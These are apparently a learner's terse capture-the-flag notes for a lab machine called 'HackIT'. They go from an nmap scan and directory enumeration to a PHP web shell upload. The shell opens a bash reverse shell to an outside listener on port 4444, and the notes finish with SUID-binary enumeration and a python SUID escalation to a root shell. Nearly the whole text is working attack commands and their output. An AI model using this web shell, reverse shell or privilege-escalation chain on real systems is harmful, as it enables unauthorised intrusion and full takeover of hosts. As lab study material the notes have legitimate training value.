ip: 10.10.64.225

Nmap scan report for 10.10.64.225
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4ab9160884c25448ba5cfd3f225f2214 (RSA)
|   256 a9a686e8ec96c3f003cd16d54973d082 (ECDSA)
|_  256 22f6b5a654d9787c26035a95f3f9dfcd (ED25519)
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
2002/tcp filtered globe
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.85 seconds


...
http://10.10.64.225/panel                (Status: 301) [Size: 314] [--> http://10.10.64.225/panel/
http://10.10.64.225/server-status        (Status: 403) [Size: 278]
http://10.10.64.225/uploads              (Status: 301) [Size: 316] [--> http://10.10.64.225/uploads/]

shell.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.2.38.40/4444 0>&1'");
?> 

nc -lvp 4444

# Better commandline
python3 -c 'import pty; pty.spawn("/bin/bash")'

# ESCALATING PRIVILEGES
find / -perm -4000 -type f 2>/dev/null
...
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
...

/usr/bin/python -c 'import os; os.system("ls /root/")'

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
